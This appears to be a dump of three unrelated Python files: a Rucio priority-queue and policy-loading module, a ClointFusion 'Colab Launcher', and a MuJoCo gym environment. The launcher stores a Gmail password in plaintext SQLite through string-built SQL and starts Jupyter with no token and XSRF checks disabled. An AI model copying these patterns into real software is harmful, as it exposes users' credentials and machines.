# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
class PriorityQueue:
"""
Heap-based [1] priority queue which supports priority update operations
It is used as a dictionary: pq['element'] = priority
The element with the highest priority can be accessed with pq.top() or pq.pop(),
depending on the desire to keep it in the heap or not.
[1] https://en.wikipedia.org/wiki/Heap_(data_structure)
"""
class ContainerSlot:
def __init__(self, position, priority):
self.pos = position
self.prio = priority
def __init__(self):
self.heap = []
self.container = {}
self.empty_slots = []
def __len__(self):
return len(self.heap)
def __getitem__(self, item):
return self.container[item].prio
def __setitem__(self, key, value):
if key in self.container:
existing_prio = self.container[key].prio
self.container[key].prio = value
if value < existing_prio:
self._priority_decreased(key)
elif existing_prio < value:
self._priority_increased(key)
else:
self.heap.append(key)
self.container[key] = self.ContainerSlot(position=len(self.heap) - 1, priority=value)
self._priority_decreased(key)
def __contains__(self, item):
return item in self.container
def top(self):
return self.heap[0]
def pop(self):
item = self.heap[0]
self.container.pop(item)
tmp_item = self.heap.pop()
if self.heap:
self.heap[0] = tmp_item
self.container[tmp_item].pos = 0
self._priority_increased(tmp_item)
return item
def _priority_decreased(self, item):
heap_changed = False
pos = self.container[item].pos
pos_parent = (pos - 1) // 2
while pos > 0 and self.container[self.heap[pos]].prio < self.container[self.heap[pos_parent]].prio:
tmp_item, parent = self.heap[pos], self.heap[pos_parent] = self.heap[pos_parent], self.heap[pos]
self.container[tmp_item].pos, self.container[parent].pos = self.container[parent].pos, self.container[tmp_item].pos
pos = pos_parent
pos_parent = (pos - 1) // 2
heap_changed = True
return heap_changed
def _priority_increased(self, item):
heap_changed = False
heap_len = len(self.heap)
pos = self.container[item].pos
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_restored = False
while not heap_restored:
# find minimum between item, child1, and child2
if pos_child1 < heap_len and self.container[self.heap[pos_child1]].prio < self.container[self.heap[pos]].prio:
pos_min = pos_child1
else:
pos_min = pos
if pos_child2 < heap_len and self.container[self.heap[pos_child2]].prio < self.container[self.heap[pos_min]].prio:
pos_min = pos_child2
if pos_min != pos:
_, tmp_item = self.heap[pos_min], self.heap[pos] = self.heap[pos], self.heap[pos_min]
self.container[tmp_item].pos = pos
pos = pos_min
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_changed = True
else:
heap_restored = True
self.container[self.heap[pos]].pos = pos
return heap_changed
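# Illustrative usage (not part of the original module): the entry with the smallest
# priority value sits at the top of the heap; assigning to an existing key updates its
# position.
#     pq = PriorityQueue()
#     pq['rse_a'] = 5
#     pq['rse_b'] = 2
#     pq['rse_a'] = 1          # priority update
#     pq.top()                 # -> 'rse_a'
#     pq.pop()                 # -> 'rse_a' (removed from the queue)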
def register_policy_package_algorithms(algorithm_type, dictionary):
'''
Loads all the algorithms of a given type from the policy package(s) and registers them
:param algorithm_type: the type of algorithm to register (e.g. 'surl', 'lfn2pfn')
:param dictionary: the dictionary to register them in
'''
def try_importing_policy(algorithm_type, dictionary, vo=None):
import importlib
try:
env_name = 'RUCIO_POLICY_PACKAGE' + ('' if not vo else '_' + vo.upper())
if env_name in os.environ:
package = os.environ[env_name]
else:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo))
module = importlib.import_module(package)
if hasattr(module, 'get_algorithms'):
all_algorithms = module.get_algorithms()
if algorithm_type in all_algorithms:
algorithms = all_algorithms[algorithm_type]
if not vo:
dictionary.update(algorithms)
else:
# check that the names are correctly prefixed
for k in algorithms.keys():
if k.lower().startswith(vo.lower()):
dictionary[k] = algorithms[k]
else:
raise InvalidAlgorithmName(k, vo)
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy(algorithm_type, dictionary)
else:
# determine whether on client or server
client = False
if 'RUCIO_CLIENT_MODE' not in os.environ:
if not config.config_has_section('database') and config.config_has_section('client'):
client = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client = True
# on client, only register algorithms for selected VO
if client:
if 'RUCIO_VO' in os.environ:
vo = os.environ['RUCIO_VO']
else:
try:
vo = config.config_get('client', 'vo')
except (NoOptionError, NoSectionError):
vo = 'def'
try_importing_policy(algorithm_type, dictionary, vo)
# on server, list all VOs and register their algorithms
else:
from rucio.core.vo import list_vos
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(algorithm_type, dictionary, vo['vo'])
|
Colab_Launcher.py
|
from helium._impl import selenium_wrappers
from pyautogui import KEYBOARD_KEYS
import pyinspect as pi
from rich import pretty
import os, sys, threading, time, traceback, platform, subprocess, sqlite3, requests
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
pretty.install()
cf_icon_file_path = "Cloint-ICON.ico"
cursr = ""
connct = ""
email = ""
passwd= ""
url = 'https://raw.githubusercontent.com/ClointFusion/ClointFusion/master/requirements.txt'
FIRST_TIME = False
windows_os = "windows"
linux_os = "linux"
mac_os = "darwin"
os_name = str(platform.system()).lower()
if os_name == windows_os:
clointfusion_directory = r"C:\Users\{}\ClointFusion".format(str(os.getlogin()))
elif os_name == linux_os:
clointfusion_directory = r"/home/{}/ClointFusion".format(str(os.getlogin()))
elif os_name == mac_os:
clointfusion_directory = r"/Users/{}/ClointFusion".format(str(os.getlogin()))
os.chdir(clointfusion_directory)
try:
os.system("{} -m pip install --upgrade pip".format(sys.executable))
except Exception as ex:
print("Error updating PIP = " + str(ex) )
requirements_page = requests.get(url)
req_pkg_lst = str(requirements_page.text).splitlines()
req_pkg_lst = list(map(lambda s: s.strip(), req_pkg_lst))
def db_create_database_connect():
"""
Function to create a database and connect to it
"""
global cursr
global connct
try:
# connct = sqlite3.connect('{}.db'.format(database_name))
connct = sqlite3.connect(r'{}\{}.db'.format(clointfusion_directory,"ClointFusion_DB"))
cursr = connct.cursor()
# print('Created & Connected with Database \'{}\''.format("ClointFusion_DB"))
except Exception as ex:
print("Error in db_create_database_connect="+str(ex))
def db_create_table():
global cursr
global connct
try:
table_name = 'My_Table'
table_dict={'email': 'TEXT', 'passwd': 'TEXT'}
table = str(table_dict).replace("{","").replace("'","").replace(":","").replace("}","")
# table = table.replace('INT,','INT PRIMARY KEY,',1) #make first field as PK
exec_query = "CREATE TABLE IF NOT EXISTS {}({});".format(table_name,table)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print('Table \'{}\' created'.format(table_name))
except Exception as ex:
print("Error in db_create_table="+str(ex))
def db_check_record():
global cursr
global connct
global email, passwd
table_name = 'My_Table'
exec_query = "SELECT * FROM {};".format(table_name)
cursr.execute(exec_query)
all_results = cursr.fetchall()
if all_results:
email = all_results[0][0]
passwd = all_results[0][1]
return all_results
def db_insert_rows(email, passwd):
global cursr
global connct
table_name = 'My_Table'
table_dict = {'email':email,'passwd':passwd}
table_keys = str(table_dict.keys()).replace('dict_keys([',"").replace("'","").replace("])","")
table_values = str(table_dict.values()).replace('dict_values([',"").replace("])","")
exec_query = "INSERT INTO {}({}) VALUES({});".format(table_name,table_keys,table_values)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print("Row with values {} inserted into \'{}\'".format(table_values,table_name))
def _load_missing_python_packages_windows(list_of_required_packages_1=[]):
"""
Installs Windows OS specific python packages
"""
try:
list_of_required_packages = [x.strip().lower() for x in list_of_required_packages_1]
reqs = subprocess.check_output([sys.executable, '-m', 'pip', 'list'])
installed_packages = [str(r.decode().split('==')[0]).strip().lower() for r in reqs.split()]
missing_packages = ' '.join(list(set(list_of_required_packages)-set(installed_packages)))
if missing_packages:
print("{} package(s) are missing".format(missing_packages))
if "comtypes" in missing_packages:
os.system("{} -m pip install comtypes==1.1.7".format(sys.executable))
            for pkg in missing_packages.split():  # iterate over package names, not characters of the joined string
                pkg_with_version = list(filter(lambda a: pkg in a, req_pkg_lst))
                # print(pkg_with_version)
                cmd = "pip install {}".format(pkg_with_version[0] if pkg_with_version else pkg)
                # print(cmd)
                os.system(cmd)
except Exception as ex:
print("Error in _load_missing_python_packages_windows="+str(ex))
try:
import pyautogui as pg
except Exception as ex:
_load_missing_python_packages_windows(['pyautogui'])
import pyautogui as pg
os_name = str(platform.system()).lower()
if os_name != 'windows':
pg.alert("Colab Launcher works only on windows OS as of now")
exit(0)
try:
import psutil
except:
_load_missing_python_packages_windows(["psutil"])
import psutil
def is_chrome_open():
try:
for proc in psutil.process_iter(['pid', 'name']):
# This will check if there exists any process running with executable name
if proc.info['name'] == 'chrome.exe':
yes_no=pg.confirm(text='Chrome browser needs to be closed !\n\nPlease click "Yes" to forcefully close it', title="ClointFusion's Colab Launcher", buttons=['Yes', 'No'])
if yes_no == 'Yes':
try:
subprocess.call("TASKKILL /f /IM CHROME.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
try:
subprocess.call("TASKKILL /f /IM CHROMEDRIVER.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
return False
else:
return True
except Exception as ex:
pg.alert("Error while closing chrome")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
exit(0)
if is_chrome_open()==True:
pg.alert("Please close Google Chrome browser & try again")
exit(0)
# try:
# os.system("pip install -r {}".format(requirements_path))
# except Exception as ex:
try:
_load_missing_python_packages_windows(['setuptools ','wheel', 'watchdog','Pillow','pynput','pif','PyAutoGUI ','PySimpleGUI ','bs4','clipboard','emoji','folium ','helium','imutils','kaleido','keyboard','matplotlib','numpy','opencv-python','openpyxl','pandas','plotly','requests','selenium','texthero','wordcloud','zipcodes','pathlib3x','pathlib','PyQt5','email-validator','testresources','scikit-image ','pivottablejs','ipython ','comtypes','cryptocode','ImageHash','get-mac','xlsx2html ','simplegmail','xlwings ','jupyterlab','notebook','Pygments','psutil','gspread'])
except Exception as ex:
pg.alert("Error while executing pip install -r requirements.txt")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# finally:
# import ClointFusion_Lite as cfl
try:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
except:
_load_missing_python_packages_windows(['selenium','helium'])
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
from webdriver_manager.chrome import ChromeDriverManager
# try:
# import ClointFusion
# except Exception as ex:
# try:
# # os.system("pip install ClointFusion")
# _load_missing_python_packages_windows(['clointfusion'])
# except:
# pg.alert("Error while executing pip install ClointFusion")
# exc_type, exc_value, exc_tb = sys.exc_info()
# pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# sys.exit(0)
try:
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
except:
# _load_missing_python_packages_windows(['keyboard','PySimpleGUI','PyGetWindow'])
_load_missing_python_packages_windows(['PySimpleGUI','PyGetWindow'])
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
def launch_jupyter():
try:
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.8 && jupyter serverextension enable --py jupyter_http_over_ws"
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
except:
print("Error in launch_jupyter")
pg.alert("Error in launch_jupyter")
#Kill the port if busy
try:
os.system('taskkill /F /PID 8888')
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.7 && jupyter serverextension enable --py jupyter_http_over_ws"
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# 'jupyter notebook --NotebookApp.allow_origin='https://colab.research.google.com' --NotebookApp.port_retries=0 --notebook-dir="" --no-browser --allow-root --NotebookApp.token='' --NotebookApp.disable_check_xsrf=True --port=8888
os.system(cmd)
except Exception as ex:
print("Port is busy = "+str(ex))
db_create_database_connect()
db_create_table()
def get_email_password_from_user():
global FIRST_TIME
try:
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text='Please enter Gmail ID:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-GMAIL-', justification='c',focus=True)],
[sg.Text(text='Please enter Password:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-PASSWD-', justification='c',password_char='*')],
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("These credentials will be stored on you local computer, used to automatically login & will be associated with Colab Launcher")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
# break
sys.exit(0)
if event == 'OK':
if values and values['-GMAIL-'] and values['-PASSWD-']:
db_insert_rows(values['-GMAIL-'],values['-PASSWD-'])
FIRST_TIME = True
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
def db_delete_data():
global cursr
cursr.execute("""{}""".format("DELETE FROM 'My_Table' WHERE email='mayur@cloint.com'"))
all_results = cursr.fetchall()
print(all_results)
# db_delete_data()
if not db_check_record():
get_email_password_from_user()
def get_colab_url_from_user():
ret_val = "cancelled"
try:
dropdown_list = ["ClointFusion Labs (Public)", "ClointFusion Starter (Hackathon)"] #"ClointFusion Lite (Interns Only)"
oldKey = "Please choose desired Colab :"
# oldValue = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
oldValue = 'ClointFusion Labs (Public)'
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text=oldKey,font=('Courier 12'),text_color='yellow'),sg.Listbox(dropdown_list,size=(30, 5),key='user_choice',default_values=oldValue,enable_events=True,change_submits=True)],#oluser_choice
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("This is an automated tool which connects ClointFusion Colab with your Local Runtime.\nSign-in using your Gmail ID & wait for setup to Finish..")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
break
if event == 'OK':
if values and values['user_choice']:
ret_val = str(values['user_choice'][0])
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
finally:
return ret_val
def modify_file_as_text(text_file_path, text_to_search, replacement_text):
import fileinput
with fileinput.FileInput(text_file_path, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace(text_to_search, replacement_text), end='')
def connect_to_local_runtime(user_choice):
try:
# import chromedriver_binary
if user_choice == "ClointFusion Labs (Public)":
colab_url = "https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb" #https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# colab_url = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# elif user_choice == "ClointFusion Lite (Interns Only)":
# #Extract encrypted version of ClointFusion_Lite to a specific folder and in Colab import that folder
# colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/11MvoQfNFXJqlXKcXV1LBVUE98Ks48M_a'
elif user_choice == "ClointFusion Starter (Hackathon)":
colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/1G9mh58z8AbWqBit2TC4Wgg6p_eHPvUJB'
user_data_path = "C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin())
modify_file_as_text(user_data_path + '\\Default\\Preferences', 'crashed', 'false')
options = Options()
options.add_argument("--start-maximized")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
if os_name == "windows":
options.add_argument("user-data-dir=C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin()))
elif os_name == "darwin":
options.add_argument("user-data-dir=/Users/{}/Library/Application/Support/Google/Chrome/User Data".format(os.getlogin()))
options.add_argument(f"profile-directory=Default")
browser_driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
browser.set_driver(browser_driver)
browser.go_to(colab_url)
chrome = gw.getWindowsWithTitle('Google Chrome')[0]
chrome.activate()
# pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
# kb.press_and_release('esc')
# kb.press_and_release('esc')
try:
browser.wait_until(browser.Text("Code").exists,timeout_secs=6)
except :#selenium_wrappers.common.exceptions.TimeoutException:
try:
browser.click(email)
except:
browser.write(email, into='Email or phone')
browser.click('Next')
time.sleep(0.5)
browser.write(passwd, into='Enter your password')
browser.click('Next')
time.sleep(0.5)
browser.wait_until(browser.Text("Code").exists,timeout_secs=240)
# kb.press_and_release('esc')
# time.sleep(0.2)
# pg.press(ESCAPE)
# time.sleep(0.2)
# press(ESCAPE)
# time.sleep(0.2)
if FIRST_TIME:
#create short-cut
browser.press(browser.CONTROL + 'mh')
time.sleep(1)
v = S("//input[@id='pref_shortcut_connectLocal']")
browser.write('',v)
browser.press(browser.CONTROL + '1')
time.sleep(0.5)
browser.click("SAVE")
time.sleep(1)
#use short-cut
browser.press(browser.CONTROL + '1')
time.sleep(1)
# pg.alert("HKHR")
pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
time.sleep(1)
if FIRST_TIME:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
pg.write("http://localhost:8888")
# kb.write("http://localhost:8888")
time.sleep(2)
# click("CONNECT")
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(1)
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(2)
else:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
browser.press(browser.ENTER)
time.sleep(2)
# try:
# img = "Restore_Bubble.PNG"
# pos = pg.locateOnScreen(img, confidence=0.8) #region=
# pg.alert(pos)
# pg.click(*pos)
# except:
# pass
pg.alert("Ready ! Google Colab is now connected with your Local Runtime.\n\nPlease click 'OK' & you are all set to work on ClointFusion Colabs...")
except Exception as ex:
print("Error in connect_to_local_runtime="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
pg.alert("Error in connect_to_local_runtime="+str(ex))
        connect_to_local_runtime(user_choice)  # retry once more with the same selection
# def popup_msg():
# sg.PopupTimed("Loading... Please wait", auto_close=30)
if __name__ == "__main__":
try:
user_choice = get_colab_url_from_user()
if user_choice != "cancelled":
# creating threads
t1 = threading.Thread(target=connect_to_local_runtime,args=(user_choice,))
t2 = threading.Thread(target=launch_jupyter)
# t3 = threading.Thread(target=popup_msg)
t1.start()
t2.start()
# t3.start()
t1.join()
t2.join()
# t3.join()
else:
print("User Cancelled the Launch")
except Exception as ex:
pg.alert("Error in Main="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
print("Error in Main="+str(ex))
|
mjc_env.py
|
import matplotlib.pyplot as plt
import numpy as np
import os
import random
from threading import Thread
import time
import traceback
import sys
import xml.etree.ElementTree as xml
from dm_control.mujoco import Physics, TextOverlay
from dm_control.mujoco.wrapper.mjbindings import enums
from dm_control.rl.control import PhysicsError
from gym import spaces
from gym.core import Env
import opentamp
from opentamp.envs.mjc_xml_utils import *
from opentamp.envs import transform_utils as T
BASE_XML = opentamp.__path__._path[0] +'/robot_info/empty.xml'
ENV_XML = opentamp.__path__._path[0] + '/robot_info/current_empty.xml'
SPECIFIC_ENV_XML = opentamp.__path__._path[0] + '/robot_info/temp_env_xmls/current_{0}.xml'
_MAX_FRONTBUFFER_SIZE = 2048
_CAM_WIDTH = 200
_CAM_HEIGHT = 150
CTRL_MODES = ['joint_angle', 'end_effector', 'end_effector_pos', 'discrete_pos', 'discrete']
class MJCEnv(Env):
metadata = {'render.modes': ['human', 'rgb_array', 'depth'], 'video.frames_per_second': 67}
def __init__(self, mode='end_effector', obs_include=[], items=[], include_files=[], include_items=[], im_dims=(_CAM_WIDTH, _CAM_HEIGHT), sim_freq=25, timestep=0.002, max_iter=250, mult=3e2, view=False, load_render=True, act_jnts=[], xmlid='0'):
assert mode in CTRL_MODES, 'Env mode must be one of {0}'.format(CTRL_MODES)
self.ctrl_mode = mode
self.active = True
self.cur_time = 0.
self.prev_time = 0.
self.timestep = timestep
self.sim_freq = sim_freq
        self.mult = mult  # honour the constructor argument instead of hard-coding 3e2
self.use_viewer = view
self.use_glew = 'MUJOCO_GL' not in os.environ or os.environ['MUJOCO_GL'] == 'glfw'
self.obs_include = obs_include
self._joint_map_cache = {}
self._ind_cache = {}
self._type_cache = {}
self._user_data = {}
self._cache_rendering = False
self._cached_images = {}
self._last_rendered_state = (None, None)
self.im_wid, self.im_height = im_dims
self.items = items
self._item_map = {item[0]: item for item in items}
self.include_files = include_files
self.include_items = include_items
self.item_names = list(self._item_map.keys()) + [item['name'] for item in include_items]
self.act_jnts = act_jnts
self.xmlid = xmlid
self._load_model()
self._set_obs_info(obs_include)
for item in self.include_items:
if item.get('is_fixed', False): continue
name = item['name']
pos = item.get('pos', (0, 0, 0))
quat = item.get("quat", (1, 0, 0, 0))
self.set_item_pos(name, pos)
self.set_item_rot(name, quat)
self.init_state = self.physics.data.qpos.copy()
self._init_control_info()
self._max_iter = max_iter
self._cur_iter = 0
self.load_render = load_render
if self.load_render:
try:
from dm_control import render
except:
from dm_control import _render as render
self._viewer = None
if view and self.load_render:
self.add_viewer()
self.render(camera_id=0)
self.render(camera_id=0)
@classmethod
def load_config(cls, config):
mode = config.get("mode", "joint_angle")
obs_include = config.get("obs_include", [])
items = config.get("items", [])
include_files = config.get("include_files", [])
include_items = config.get("include_items", [])
im_dims = config.get("image_dimensions", (_CAM_WIDTH, _CAM_HEIGHT))
sim_freq = config.get("sim_freq", 25)
ts = config.get("mjc_timestep", 0.002)
mult = config.get("step_mult", 3e2)
view = config.get("view", False)
max_iter = config.get("max_iterations", 250)
load_render = config.get("load_render", True)
act_jnts = config.get("act_jnts", [])
xmlid = config.get("xmlid", 0)
return cls(mode, obs_include, items, include_files, include_items, im_dims, sim_freq, ts, max_iter, mult, view, load_render=load_render, act_jnts=act_jnts, xmlid=xmlid)
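    # Illustrative usage (not part of the original module): a minimal config dictionary;
    # all keys are optional and fall back to the defaults shown in load_config above.
    #     env = MJCEnv.load_config({
    #         'mode': 'joint_angle',
    #         'obs_include': ['overhead_image'],
    #         'image_dimensions': (200, 150),
    #         'view': False,
    #     })
    #     obs, reward, done, info = env.step(np.zeros(env.physics.model.nu))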
def _load_model(self):
xmlpath = SPECIFIC_ENV_XML.format(self.xmlid)
generate_xml(BASE_XML, xmlpath, self.items, self.include_files, self.include_items, timestep=self.timestep)
self.physics = Physics.from_xml_path(xmlpath)
def _init_control_info(self):
print('No control information to initialize.')
def add_viewer(self):
if self._viewer is not None: return
self.cur_im = np.zeros((self.im_height, self.im_wid, 3))
self._launch_viewer(_CAM_WIDTH, _CAM_HEIGHT)
def _launch_viewer(self, width, height, title='Main'):
self._matplot_view_thread = None
if self.use_glew:
from dm_control.viewer import viewer
from dm_control.viewer import views
from dm_control.viewer import gui
from dm_control.viewer import renderer
self._renderer = renderer.NullRenderer()
self._render_surface = None
self._viewport = renderer.Viewport(width, height)
self._window = gui.RenderWindow(width, height, title)
self._viewer = viewer.Viewer(
self._viewport, self._window.mouse, self._window.keyboard)
self._viewer_layout = views.ViewportLayout()
self._viewer.render()
else:
self._viewer = None
self._matplot_im = None
self._run_matplot_view()
def _reload_viewer(self):
if self._viewer is None or not self.use_glew: return
if self._render_surface:
self._render_surface.free()
if self._renderer:
self._renderer.release()
self._render_surface = render.Renderer(
max_width=_MAX_FRONTBUFFER_SIZE, max_height=_MAX_FRONTBUFFER_SIZE)
self._renderer = renderer.OffScreenRenderer(
self.physics.model, self._render_surface)
self._renderer.components += self._viewer_layout
self._viewer.initialize(
self.physics, self._renderer, touchpad=False)
self._viewer.zoom_to_scene()
def _render_viewer(self, pixels):
if self.use_glew:
with self._window._context.make_current() as ctx:
ctx.call(
self._window._update_gui_on_render_thread, self._window._context.window, pixels)
self._window._mouse.process_events()
self._window._keyboard.process_events()
else:
if self._matplot_im is not None:
self._matplot_im.set_data(pixels)
plt.draw()
def _run_matplot_view(self):
self._matplot_view_thread = Thread(target=self._launch_matplot_view)
self._matplot_view_thread.daemon = True
self._matplot_view_thread.start()
def _launch_matplot_view(self):
try:
# self._matplot_im = plt.imshow(self.render(view=False))
self._matplot_im = plt.imshow(self.cur_im)
plt.show()
        except Exception:
print('\nCould not find display to launch viewer (this does not affect the ability to render images)\n')
@property
def qpos(self):
return self.physics.data.qpos
@property
def qvel(self):
return self.physics.data.qvel
@property
def qacc(self):
return self.physics.data.qacc
def step(self, action, mode=None, obs_include=None, gen_obs=True, view=False, debug=False):
for t in range(self.sim_freq):
cur_state = self.physics.data.qpos.copy()
cur_act = self.get_jnt_vec(self.act_jnts)
if mode is None or mode == 'position' or mode == 'joint_angle':
self.physics.set_control(action)
elif mode == 'velocity':
self.physics.set_control(self.mult*(action-cur_act))
qacc = self.physics.data.actuator_force.copy()
try:
self.physics.step()
except PhysicsError as e:
#traceback.print_exception(*sys.exc_info())
print('\nERROR IN PHYSICS SIMULATION; RESETTING ENV.\n')
self.physics.reset()
self.physics.data.qpos[:] = cur_state[:]
self.physics.forward()
if not gen_obs: return
return self.get_obs(obs_include=obs_include, view=view), \
self.compute_reward(), \
self.is_done(), \
{}
def get_sensors(self, sensors=[]):
if not len(sensors):
return self.physics.data.sensordata.copy()
        inds = [self.physics.model.name2id(s, 'sensor') for s in sensors]  # name2id is a method, not a mapping
return self.physics.data.sensordata[inds]
def get_state(self):
return self.physics.data.qpos.copy()
def set_state(self, state):
self.physics.data.qpos[:] = state
self.physics.forward()
'''
def __getstate__(self):
return self.physics.data.qpos.tolist()
'''
'''
def __setstate__(self, state):
self.physics.data.qpos[:] = state
self.physics.forward()
'''
def _set_obs_info(self, obs_include):
self._obs_inds = {}
self._obs_shape = {}
ind = 0
if 'overhead_image' in obs_include or not len(obs_include):
self._obs_inds['overhead_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['overhead_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
# if 'forward_image' in obs_include or not len(obs_include):
# self._obs_inds['forward_image'] = (ind, ind+3*self.im_wid*self.im_height)
# self._obs_shape['forward_image'] = (self.im_height, self.im_wid, 3)
# ind += 3*self.im_wid*self.im_height
for item, xml, info in self.items:
if item in obs_include or not len(obs_include):
self._obs_inds[item] = (ind, ind+3) # Only store 3d Position
self._obs_shape[item] = (3,)
ind += 3
self.dO = ind
self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(ind,), dtype='float32')
return ind
def get_obs(self, obs_include=None, view=False):
obs = np.zeros(self.dO)
if obs_include is None:
obs_include = self.obs_include
if self.load_render:
if view or not len(obs_include) or 'overhead_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=0, view=view)
if 'overhead_image' in self._obs_inds:
inds = self._obs_inds['overhead_image']
obs[inds[0]:inds[1]] = pixels.flatten()
# if not len(obs_include) or 'forward_image' in obs_include:
# pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=1, view=view)
# inds = self._obs_inds['forward_image']
# obs[inds[0]:inds[1]] = pixels.flatten()
for item in self.items:
if not len(obs_include) or item[0] in obs_include:
inds = self._obs_inds[item[0]]
obs[inds[0]:inds[1]] = self.get_item_pos(item[0])
return np.array(obs)
def get_obs_types(self):
return list(self._obs_inds.keys())
def get_obs_inds(self, obs_type):
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
return self._obs_inds[obs_type]
def get_obs_shape(self, obs_type):
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
return self._obs_shape[obs_type]
def get_obs_data(self, obs, obs_type):
obs = np.array(obs)
if obs_type not in self._obs_inds:
raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
inds = self._obs_inds[obs_type]
return obs[inds[0]:inds[1]].reshape(self._obs_shape[obs_type])
def get_attr(self, name, attr, mujoco_frame=True):
if attr.find('ee_pos') >= 0:
name = attr.replace('ee_pos', 'gripper')
attr = 'pose'
